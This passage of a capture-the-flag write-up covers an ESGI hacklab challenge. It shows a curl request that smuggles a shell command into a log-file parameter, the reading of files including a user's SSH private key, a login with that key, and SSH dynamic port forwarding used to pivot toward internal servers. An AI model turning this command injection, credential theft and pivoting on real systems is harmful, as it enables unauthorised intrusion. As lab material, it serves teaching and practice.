$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://ctf.hacklab-esgi.org:5008/login.php' -H 'Connection: keep-alive' -H 'Cookie: _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=hffthjjq4jil8o5at2mklo4fc4' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0' -X POST --data 'log=../../../../../../../var/log/apache2/access.log -n 1 | cat /home/trobin/TODO.txt'

/home/trobin/TODO.txt

- Finish admin backend functionnality
- Clean up the server

/home/trobin/script/get-ssh-connection

#!/bin/bash
# Description : collect some error log
# Author : Th1b4ud

cat /var/log/auth.log | grep ssh | grep "session opened"

/home/test/.ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
$ chmod 0600 id_rsa
$ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa
Linux dev-server 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64

 ____         _  ___
|_  /___  __| |/ __|___ _ _ _ __
 / // -_) _` | (__/ _ \ '_| '_ \
/___\___\__,_|\___\___/_| | .__/
        Dev Server        |_|

[HINT] : Do you know proxychains ?
Last login: Sat Apr 6 04:20:26 2019 from 78.245.84.201
This account is currently not available.
Connection to ctf.hacklab-esgi.org closed.

The connection closes immediately because the test user has no shell (more precisely, its shell is /usr/sbin/nologin).

By reading /etc/hostname we know we are on dev-server, so the flag must be on the project or admin server.

10.0.0.2        project-server  project-server.zedcorp
10.0.0.3        admin-server    admin-server.zedcorp

/etc/resolv.conf is configured to nameserver 192.168.122.1.

$ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa -fN -D 4321

  • -f : ssh in background
  • -N : do not execute a remote command
  • -D 4321 : dynamic port forwarding (local SOCKS proxy on port 4321)